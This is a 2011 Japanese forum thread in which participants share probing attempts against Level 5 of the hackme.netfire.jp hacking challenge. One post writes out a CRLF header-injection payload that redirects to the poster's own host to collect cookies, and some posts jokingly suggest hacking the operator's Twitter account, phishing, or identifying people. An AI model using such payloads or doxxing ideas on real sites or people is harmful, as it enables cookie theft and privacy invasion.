仕事をちゃんとこなしてるならいいんじゃね? 仕事をしてる振りほど、キツイもんはないからなぁ
>>742 name=&name&password=&password でも同じエラー出るね。
あと他の Lv でも同じ挙動だから無関係だろうけど、
/Lv5/login%00(任意の文字列)
でもアクセスできるようになってるみたい。
>>754 うん、それは俺も試してみた
Nullバイト+OSインジェクションとかさ
でも手応えがない…
>> 755 確かに、でも勉強してもその単語はでてこんだろうw
>>757 アンカーちゃんと打たないのは、何か理由があるのか?
ええい、誰ぞ奴を討てる者はおらんのか!
ヤツがすごいのは文句ないが、 周りの奴らが勘違いしているのがちょっとな
hackクリアできなくても個人特定はできるぞ
なんかヒント欲しいな〜 > lv5 Lv4まではなんだかんだ言ってもタメになったので
> Lv5、解けはしたので着地点は合っているんだろうけど色々気になっているのでまた考えてみる。 そんな曖昧に突破したのか?
ト|ackme
нackme
そんなことより、まずは中の人のTwitterアカウントをhackするところからじゃね? 個人を特定する、と。 その後、netfire社に電話するとか、中途採用/新卒採用に応募して、面接で聞き出すとかじゃね。
おぉ、Lv5が3人になっとるーーーーーーー!!! dotdister 称号: ハッカー すげーぇ。"称号:"や"ハッカー"はこのスレのやつか?
わがんね これでLv4のように判定の問題だったらバッシングの嵐
いや、フィッシング用のページを用意して・・
>>768 同じネタは何度も通用しないから。改行は3つくらいにしておきなさい。
>>744 春の近付きを知らせる陽気之中其れとは真逆之陰気だらけ之部屋で個人計算機を操作して擬似不正侵入行為に勤しむが然し全く以って成功せず世界的網上之匿名掲示板で罵り合いをする奴等
input要素削ってpostすると、 Missing value って出るけど、既知?
既に出てるし、LV5以外でも出るGAE上のエラー
やったんだよ。GETは無視されてPOSTでやっても普通の反応しかない。 inputのname属性をいじるんじゃなく?
Tamper Data でやったら 文字を与えてください(<type 'list'>: [u'', u'']です) になる俺はもう寝る。
もしかしてYahoo知恵袋で聞いたら教えてくれるんじゃないか?
もはやシミュレートされた脆弱性じゃなくてガチの脆弱性を探してる感じになりつつあるなw
783 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 01:44:18.54
The input field '\r\nInjectionTest' was not expected. っていうエラー出せた。 小さな一歩だけど進んだな
Lv5ってNetFireの製品テストじゃないのか? それで、突破できた人は脆弱性をいかにして見つけどうやったかを提出・・・。 とか
>>783 本気で言ってるんだったら寝ろ。少しは休め。
787 :
783 :2011/02/28(月) 01:54:00.66
790 :
783 :2011/02/28(月) 02:00:45.01
>>788 セミコロンをPOSTしたら、その後の文字列が「was not expected」として出るみたい。
(Lv1からLv5までどこでも)
「他Lvでも共通で出る箇所は掘り進んでも何もない」ととりあえず仮定してるが、
何も上手くいかないようだったらここを掘り進んでみるのもアリだと思うがな
>>790 was not expected.(予期されていない)
The input field '***' was not expected.
入力されたフィールド(***と入力されている)は予期されていません。
ってことだから。意味ないから・・・
>>790 http://www.w3.org/TR/html401/appendix/notes.html#h-B.2.2 ここ見ればわかるけど、
> We recommend that HTTP server implementors, and in particular,
> CGI implementors support the use of ";" in place of "&"
> to save authors the trouble of escaping "&" characters in this manner.
"&" の代わりに ";" がパラメータの区切りに使えるというだけの話。
まっとうな挙動なのでここを調べても徒労に終わりそうな気がする。
793 :
783 :2011/02/28(月) 02:16:20.12
>>791 >>792 そこまでは理解してるんだけど、
それをHTML上に(クラスまで当てて)わざわざ表示してるから臭いなぁと思ったんだよね。
まぁでも考えてみれば「英数字と下線(_)だけ入力できます」とかも表示されてるしな。
無駄そうだな。
ありがとう
二人目おめ yaz_k
なんかヒントくれればいいのに
もうヒントは出さなくていいと思うけどな また大量に人が流れ込むだけ
それとLv6がないんじゃ頭打ちになってしまうな
yaz_kは口を噤んだ
ランキングに載りたいとかそんな目的はないから Lv5クリアが1000人になっても俺はヒントが知りたい
>>422 だが多分答えは削除してしまった俺の履歴の中
この先ないし解かなくてもいいよね
ヒントはいらないけど、せめて感想くらい言って欲しいな
ゴリ押しでいけるみたいだな
> 結局やってて一番イライラしたのはLv4か。と思ったらすげー簡単になってて笑える。"も/も=も+も要らないとか。 だから40文字でいけてたとあれほど
805 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 04:48:43.97
>>800 2chはオワコン
この言葉が現実になってきたな
xampp使ってる人に負けるとは・・・・ うぐぐ・・・
そこはぐぬぬ・・・だろ
おや? twitterみるとクリアした二人ってどっちも北海道の学生みたいなんだけど・・・・・ つまり・・どういうことだってばよw
元々Lv4も自分が見た時には6人しかクリアしてなかったしな ブログニュースに載るまでは更に少ない人数だったんだろ? なら2人だけなのも合点はいく
ノーコメントにしてるってことは、それに気づいたらクリアって事かねぇ?
「Lv5/index」「Lv5/next」「Lv5/login」のあとに「/」をつけても通る 本当に、これしかLv5独特の動きっていうのは見つからないよなぁ かといってこれをどうにかできる訳でもないし yaz_kのつぶやきをみるに、一番理不尽なのはLv4だったらしいから突破できれば納得できる仕様なんだろうけどさ
lv4の理不尽さは、初期に比べればマシになったけどね〜 lv2にしろ4にしろ回答が決めうちは良くなかったな・・・ しかしサッパリ見えないlv5であった
「山」「川」もだめだった。 もう俺には尽くす手だてがない
_ノ乙(、ン、)_
>>815 キモイw
屋根裏から覗いている変態か。
>>816 lv4とlv2は過去に変更入ってる
lv4は特に周りからツッコミ多かったし、修正後あっさりクリアした人も多かった
手法は増えてないんでないかなぁ。
>>821 817の反応が異次元過ぎてついレスしてしまった
lv4は何回か判定変わってるよね。 今は一番甘いときよりはちょっと難しくなってる・・・。
Lv5二人目とかwすげぇなw
俺も北海道の大学にいけばLv5をクリア出来るかな?
北見工業いてら
GETはスルーしてんじゃねーの?
レベル低すぎワロタ ここ本当にセキュ板かよwwww
煽って情報引き出すなんてのを未だにやってる奴がいるんだなw
引き出そうなんて思えるレベルですらないだろw GETのパラメータすら理解してねえじゃねえかww
パラメータって何?
そういえば、朝にPostもまともに出来ない奴が居たな・・・
ログインうんぬんに関係ないページで挙動不審なところがあるんだが、Lv5クリアするには関係ないよな
>>836 もしかしたら関係あるかも。
どんな感じ?
どのページ?
ところでLv4のハッシュって何? MD5じゃないよね? これが解読できればLv5のヒントになってたりしない?
MD5だよ
最近のゆとりセキュ民は不可逆という言葉もしらんのかいな…
ハッシュも知らないとはセキュ板も落ちたもんだな・・・
ここセキュリティ板って言うの?今知ったよ
>>841 あ 不可逆か・・・これは失礼w
しかし、過疎てるかと思った速攻でレスが返ってきてちょとワロタw
LV5をどこから攻めていいのかまったくわからん。 HTTPヘッダインジェクションを試してみてるんだが、全然だめ。 どうすりゃいいんだ…
あれ?Lv4って1度解くと再挑戦できない?
0x00〜0xFFまでのデータを一つずつ0xFF回送信 → 意味なし リクエストヘッダにも同様のことを0xFF回送信 → 意味なし 巨大なデータ送信 → 意味なし
クリアするためにやった手順を戻せば再挑戦できるよ
適当にしてたらMissing valueって出てきた
854 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 22:39:44.73
フォームのIDに「k」って入力したら「koratta」って自動補完が出てきた 同じく「i」って入力したら「I-bui」って自動補完が出てきた 俺ポケモンの名前なんて入力した覚えないんだけど。 同じ現象の人いる?
855 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 22:43:21.75
GoogleIME?
method=getにしたら英数字とか_の制限が外れた。 これ使えんのか?
無視されるだけ〜
859 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 23:08:42.11
>>857 「制限が外れた」ってただgetが無視されてるだけじゃなくて?
>>858-859 レスありがとござます。
やっぱり無視されてるだけか…
どっから抜ければいいんだ…
861 :
名無しさん@お腹いっぱい。 :2011/02/28(月) 23:14:47.15
改行コードCRLFをpostでぶち込むと弾かれず、改行コードとして評価される。 (ソースを開くと空白の改行が入ってくれる) これは穴みっけたか?
>>861 それか…
HTMLヘッダインジェクションなのかな?
とりあえずkwsk
ほんとだ タブやスペースははじかれるのに改行は通る
865 :
861 :2011/02/28(月) 23:39:28.82
だめだ、他のLvでも同じだ。
そして
>>863 とは違い、俺の場合タブも普通にぶっこめた。
普通にtextareaにもの打ち込んでるのと同じ状態なだけだな。
脆弱性にならん。。。
>>865 マジか…
Missing Valueとかも脆弱性じゃない、ならどうすれば…
やってみてもソースが改行されねえ
868 :
861 :2011/02/28(月) 23:45:31.84
マルチバイト文字の脆弱性でダブルクオートを食わせるのも試みたけど、 そこもちゃんと対策してあるみたい(あるいは俺のやり方が足らないのか)。 文字コード周りが匂うけどなぁ
869 :
861 :2011/02/28(月) 23:49:26.09
>>866 フォームのバリデーションは先人が言うようにFormEncodeを使ってて、
色々試してみた結果、少なくともLv3,Lv4でも同じようにFormEncode使ってるよな。
だからやっぱりフォーム周りの脆弱性を穿り回しても何も出てこなさそう。
870 :
861 :2011/02/28(月) 23:49:55.50
結局一番くさいのは Lv5/login Lv5/login/ ここしかないというw
871 :
863 :2011/02/28(月) 23:50:12.58
だめだもう一回やってみたら 英数字と下線(_)だけ入力できます が普通に出てきた
やる気あんの?
あぁん?
HTMLヘッダインジェクションは、結構こだわってる人いたから 一通りは試されてそう。 ま、正解が文字列完全一致しないとダメとかだと可能性は残っちゃうけど
かれこれ3時間ぐらい使ったわ… /←これの有無で何が変わるか。 わかんね
.login/../にするとLv1に飛ばされる
GETは無視されてるっぽいし /付きにPOSTしてみたけど何にも変わらないな
878 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:01:43.09
>>876 本当だ
Lv5とは関係なさそうだけど、意図がわからんなこれ
lv5名前が掲載されるまでyaz_kのフォロワーにdotdisterがいたのに、 lv5名前が掲載されたらdotdisterがyaz_kフォロワー外れたみたいだけど なんか意味あんの?
881 :
861 :2011/03/01(火) 00:05:06.20
>>874 多分試されてるだろうな。
それにヘッダインジェクションと言ってもSet-Cookieさせても意味ないし、
現実的なのはLocationで自鯖のどっかに飛ばすとかだから
%0d%0aLocation%3A%20
http://{自分のIP}/cookie.cgi 的な書き方ぐらいしか思いつかん。
>>880 情報得ようとしてたけど
自分が通ったから用無しになったんだろ
883 :
861 :2011/03/01(火) 00:08:44.16
>>876 >>878 ディレクトリ一個登ってるだけだよ。
hackme.netfire.jp/Lv5/login/../ → hackme.netfire.jp/Lv5/
hackme.netfire.jp/Lv5/../ → hackme.netfire.jp/ →(リダイレクト)→ hackme.netfire.jp/Lv1/
他のサイトでもやってみ、大体上手くいく
>>882 yaz_kがdotdisterをフォローしてたんじゃなくて
dotdisterにyaz_kがフォローされてた。
885 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:14:47.18
>>883 ブラウザがパス読んでるだけか
アホなこと書いてしまった
dotdister様が意味深なコメントを発せられたぞー
>>888 1日前のやつか。
着地点がどうたらこうたらってやつだね。
890 :
861 :2011/03/01(火) 00:36:02.70
UserAgentをiPhoneに変えたら、iPhone用のコードがヘッダーに入った (CSSとJavascript)。 他Lvでも同じ挙動するから多分関係ないけど、どきっとした
891 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:38:05.04
ネットストーカー対策どうすればいい?
繋がない
893 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:40:10.66
894 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:41:13.75
ネットストーカーができるのはだいたいどういうレベル?
895 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:43:05.65
>>894 ターゲットが統合失調症なら誰でもできる
896 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:44:34.64
技術的なことがわかるひとお答えください
897 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 00:45:05.03
>>896 技術者じゃなくて病院にいけよ糖質基地外
何について技術的なんだろうな
そもそもスレチだしなw
POSTで送るデータをどうかする所は可能性高いと思うんだけどなぁ。他のレベルじゃでないエラーがでるんだから。
901 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 01:38:32.51
902 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 01:38:44.97
北海道の情報系と言ったら - 北海道大学 - 北見工業大学 - 室蘭工業大学 - 北海学園大学 - 北海道東海大学 - 北海道情報大学 ぐらいか。 北海道大学以外は(ry
何日間か見てて思うんだけど、この板レベル高い人ってかなり少ない気がする・・・自分も低いけどそれでも「え?」っていうコメント多すぎる・・・
あきらかに別のところから難民が流れてきてる 前スレもなんやらハッカーになりたい中学生とかいたし
あれだろ、ハム速とかの影響で流れてくる奴が居るんじゃね?
セキュ板民はソーシャルハックをはじめたようです
俺のことだな。セキュ板なんて、アンチウィルスソフトの事調べるくらいしかこないし
そうか・・・中学生だろうがすごいのはすごい。自分はCSメインとはいえSEでメシくってるのに大学生に負けてるのは悲しいな・・・
このスレのレベルの低さは 情報が重複するところからも見てとれるな
<type 'list'>〜 ってXMLロード時のエラー?ここから掘っていけないのかな?
不正文字入力でフォームにログインIDがでる→何とかしてタグ破壊をしたい! という流れが割りと見受けられるが、いざ破壊できたとしてもどうにもならないとは思わないかね。
>>911 どうにもならないのかな?オレはそう判断できるレベルにはないからなんとも言えないな・・・
なんか進展できるような情報ある?
じゃあ、破壊したとして、任意のスクリプトが動作させられる状態にしたとして、 それを他のユーザにどうやって見せるの?
>>913 たしかにそうなんだよね・・・最後までの筋道たてられてれば、手法も限られて来るんだろうけど。
、それすらできてない・・・
んで、フォーム周りで出来ることとしては、 任意の項目/値を送ることが出来るわけだけど、 既知の項目については十分にエンティティ化されている→知ってる範囲では、何も出来そうにない 不正な項目については、不正な項目であることが検証によって出力される →サーバサイドですべての項目名を見ていると思っていい →項目名に細工をすることで、サーバ側で任意のコードを実行させることは出来ないか?
Lv2から、サーバアプリの言語をphpと想定するならば、 項目名を利用して誤動作を起こさせるためには、 ・register_globalsが有効になっている ・いずれかの箇所で項目名をevalする場面がある あたりがすぐ思いつくわけだけど、後者はありそうもない(かといって、ないと断言できないのは他のレベルの状況から想像がつく) register_globalsが有効になっているとして、じゃあどのような項目をほうりこむか、となるんだけど、 任意の項目名をPOSTしまくってる人は結構いそうなんだよね。 となると、上記の線は消えるのだろうか…?←イマココ
>>915 それってPOSTするデータをいじるってことかな?
>>916 phpはよくわからないけど、POSTDATAの内容次第で出るエラーに関しては他のレベルと違うものがでるのは明らか。そこを掘り下げるのが可能性が高いとは思う。ただ、それ以降がまったく(笑
フレームワークの脆弱性とかを地道に試してみるとか・・・
オレよりレベルが高い人なんてクソみたいにいると思ってるのにー!そんなにこのスレ注目されてないの?
フレームワークの予想とかでてたっけ
まずは
>>920 の想定している内容をさらしてみようぜ
>>922 ごめん、本当オレWeb系くわしくないし、クリアする道筋もない・・・
使ってるルールはTamper Data。
このスレでも書かれているようにブラウザから「;」はは受け付けないけど、このルールつかってPOSTすると変なエラーがでる。
他のレベルじゃ同じ結果にならないから、そこにクリアのきっかけがあるように思うんだけど、それ以降はアイデアなし・・・
まちがえたルールじゃなくてツール
もちろんGETだと全部無視される気がする
言語pythonだしフレームワークはpylonsだよ
>>910 それはpylonsのvalidatorのエラーだとおもう
そなんだ? pg_queryでてっきりPHP想定かと
サイト自体の実装はpythonでphpをエミュレーションしているがバグがありpylonsのエラーが吐かれるという糞仕様
何よりまだ2スレ目なのが問題でな お前らそろそろやる気見せてもいいんじゃないか?
そういえばWebブラウザーだと記号類は自動的にURLエスケープされたのが送信されるんだっけ。 ブラウザー使っている限り、記号類は1文字も送れてないな。 無駄な努力を3日も4日もしてた奴いるんじゃないか?
数万人挑戦して唯一解けた人が 「中の人の意図がわからない」 とか言ってる問題やりたくなくなってきたな。 正解わかったら怒り狂ったエロイ人達が ガチでnetfireに攻撃するんじゃw
十数万人挑戦というが、実際は垢の数=人数じゃないからな これで9割水増し状態だったら笑える
>>923 「予期しないフィールド」ってやつでしょ?
他のレベルでも起きるはずだけど。
あと;は&と同義だから;が消えるのも正しい挙動。
Firefox拡張をいちいち操作するのが面倒な人向け。
Perlだよ。
use LWP::UserAgent;
use
HTTP::Request::Common; use Smart::Comments;
{
my $ua = new LWP::UserAgent;
$ua->timeout(2);
$ua->default_headers->header(
'Content-Type' => 'multipart/form-data',
'Cookie' => 'sessionid=x23de645f27d4641f618e6eff3ccae4cfdefec4d1dcef21201afcc693fd0b4ae1d8566ad;',
);
### $ua:$ua
my $res = $ua->request(POST '
http://hackme.netfire.jp/Lv5/login ', Content => 'name=NAME&password=PASS');
### $res:$res
}
うわぁ セッションが…
936 :
934 :2011/03/01(火) 11:14:32.90
おっとmultipart/form-dataじゃなかったな。 Content-Typeの設定は外して使ってね。そこデフォルトでいいから。
934のアカウントをハックしろと言うのか
まさにhackmeだなw
SessionIDダダ漏れwクソ吹いたwww
そろそろ無効なアカウント破棄するってね
941 :
名無しさん@お腹いっぱい。 :2011/03/01(火) 11:23:19.87
>>940 早くやってほしい。
パスワード設定してないアカウントなんて使い道ないのに。
次スレは必要ないよな
とりあえずわかった事 POST絡みでどうこうするパターンはほぼ100%ない 1byteチェックで不正な文字列は全てはじかれるので インジェクションやトラバーサル系が出来ない ちなみに面白い動きとして name=;password=test%password=;name=123 等とすると nameにみたいなのが入り[u'', u'test'] passwordに[u'', u'123']が入る name=;password;name;password;password;とチェインする事も可能 でも結局byteチェックされてるのでこれ以上はどうこうしても意味がない そう言うわけでPOSTこねくり回すのは無駄という結論になりましたとさ
×name=;password=test%password=;name=123 ○name=;password=test&password=;name=123
Lv4みたいに正解の文字列だけは byteチェックされずに通るって仕様は・・・無いよね?
Lv4は正解以外だと変化として空タグが残ってたからそれはないと思う
>>698 キャッシュだよな。
ここでは読まずにレスしたりあまつさえ罵倒までしちゃうのが流行ってるの?
>>768 それ前スレの「該当者」と「なし」と同じネタじゃねーのw
>>884 >yaz_kがdotdisterをフォローしてたんじゃなくて
>dotdisterにyaz_kがフォローされてた。
両方同じに見えるのは俺の頭が悪いせいか。
yaz_k=dotdisterだろ。 どうみても。
>>943 文字はUTF-8化されて、バイト単位ではなく文字単位(1〜3バイト)で評価されると思っていたんだが。
>>949 の脆弱性をついたらこんなことに!誰かパッチを
>>949 yaz_kとdotdisterがリアフレの線も捨てきれないんじゃね?
dotdisterが疑われるの嫌ってyaz_k名前掲載直後に
リムったとかならまー多少挙動不審だけど
普通の神経持ってるやつなら自然な行動かなとか。
俺もヒント言っちまったんだろうと思うな。 実質まだ一人だな。
>>952 インジェクションされる為の文字範囲が
utf-8の符号化の結果とasciiとの結果が同一なんだから
文字単位だろうがバイト単位だろうが出来る事は一緒
アレだな、lv5って・・・脆弱性よりオナパス的な何かな気がしてきた
ID 0721 pw 0721
最後は基本中の基本,堂々のソーシャル・エンジニアリングでした!おめでとう というオチは勘弁
結局答えはなんなんだろうなぁ get/postクエリは駄目 分割攻撃はgoogleがカット この二つ塞がれたらもう殆どやる事がなくなるんだが
ついさっきあったバージョンアップの詳細を! 急いで!
可哀相・・・
そりゃ中の人も「自分で考えない馬鹿が増えた」って嘆くわw
カンニングでLV5クリアw
ソーシャルカンニングの真髄ここに極まれり
カンニングで京大合格w
誰だよ知恵袋に質問したのはw
>>972 そっか、無理か。
実質LV5のハックって無理に近いのかな?
もう俺は諦めた CTF系の閃きハック系だろうし それをオンラインでやれとか言われても萎えるだけ
俺なんかLv1〜5まで 全部前スレに書いてあったことを実行しただけだぞ?
ちょい前の大学院生とかもだけど、解くための過程と思考が楽しいのにカンぺモロ見で楽しいか?
高木さんは関連会社の技術顧問だから。
>>976 その思考をするために必要な知識が全くないから自力で解けないので答え見て感心する方が楽しい
>>978 わかるなーそれ。
自分が必死になってやっても解けなかったやつの答えを見て
あーなるほどってなるのが楽しいのかもしれん。
調べるの面倒だから、答えを人に聞く方が早いってかw
>>978 最初はそんなもんでしょ
ググるにしても、キーワードが思いつかなければどうしようもないし
ただ、ずーっと見てるだけだと成長しないけど
Lv5はhttpリクエスト色々試したけどわからん。 他のサービスの脆弱性をつくってのはナシなの? ポートスキャンした人いる?
(????)僕と契約すればLv5ぐらい解くことができるよ
984 :
名無しさん@お腹いっぱい。 :2011/03/02(水) 01:36:21.17
>>982 脆弱性はPythonで再現できるものだカス
netfireのtwitter TL見てこい
>>976 ちょうどいい難易度が一番おもしろいんだよ。
難易度が高すぎても低すぎてもつまらない。
俺の場合Lv3までは自力Lv4は半分チートが、
ちょうどいい難易度だっただけの話。
Lv5も今のままでは難易度高すぎてつまらないので、
さっさとヒント欲しい。モロバレは欲しくない。
Lv4って正直Lv3より簡単だと思うんだが XSSって猿でも理解できるし 単にどう再現してるかって疑問だけ
正規表現でチェックしてるだけだろ 疑問にもならん
yaz_kのフォロワーにdotdisterが回復してるな。 しかもreply飛ばし合ってる。
八方塞がりなんでとりあえず意見を言い合おう まずセッションを盗む系は無い つまりxssは無い 理由は共用ページがないから インジェクション関係も無い getによる入力はどうかしらんが 少なくともpostの挙動を見る限りない キャッシュ汚染系もない そもそもgaeでその辺は管理してるので管轄外 と、ここまでもう結論づけていい? 反論あったらよろしこ
>>991 俺もそう思う。
インジェクションならいい加減もっとクリアしていいはず。
あとリファラとかありそうだなーと思ったけど、何もなかったでござる。
>>980 小学生が婚活パーティーに来てる気分でやってる
喩えが下手すぎる
大学は遊ぶ所である。俺は実感した。 普段の授業中はDQN色丸出しのテニサーやサッカー、野球サークルの奴らが 先輩や友人たちの情報を駆使して要領よく単位を取り 卒業後は優良企業に就職している現実を俺は受け止められない 俺は高校時代と同様に勉強さえ頑張っていれば良いのだと思っていた とある企業へ面接に行ったときの話 同世代の上位5%に入る学歴とほとんどが優の成績の持ち主である俺なら きっと内定がもらえるだろうとそう思っていた 「あなたが学生時代最も打ち込んだことを教えてください」 面接官に聞かれる。もちろん勉強に決まっている 「そう・・・ですか。ではあなたのアピールポイントは?」 それはこの学歴と大学時代に取得した様々な資格だ 「・・・それしかないんですか?他には?」 何だと?"それしか"とはどういうことだ。十分なアピールになるだろうが そう言いたいのをこらえる。 とりあえず真面目さが売りだ。仕事は真面目にやる。 そう答えたが 「普通仕事は誰だって真面目にやりますよ。生活が掛かってるんだから」 そう言われた。いちいちうるさい面接官だ 「では大学時代の経験について聞かせてください」 だから勉強を頑張ったと言っているだろう。あ、あと本屋でのバイトもあるな、 三ヶ月でやめたけど 「そう・・・ですか。では中学、高校時代に何かスポーツはやっていましたか?」 は?勉強で忙しいのに部活、特に疲れる運動部なんかやるわけがないだろ。 勉強に差支えが出る。成績がよければ教師からほめられる。 勉強しないで部活に打ち込んでたような馬鹿とは大違いだ 「・・・分かりました。以上です。」 後日、その企業から激励の知らせを受けた
>>976 ドヤ顔でツイートせずに黙って自分の糧とするなら良いんじゃね?
>>991 脆弱性とかじゃなくて、ヒント出たら一発のひらめき系に一票
難しいね
>>976 自力で解いても答えがすでに出ているんだから、全然すごくないし何にもおもしろくないでしょ。
どちらにしてもおもしろくないなら次の問題に早く取り組むためにカンニングするのは当然だ。
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。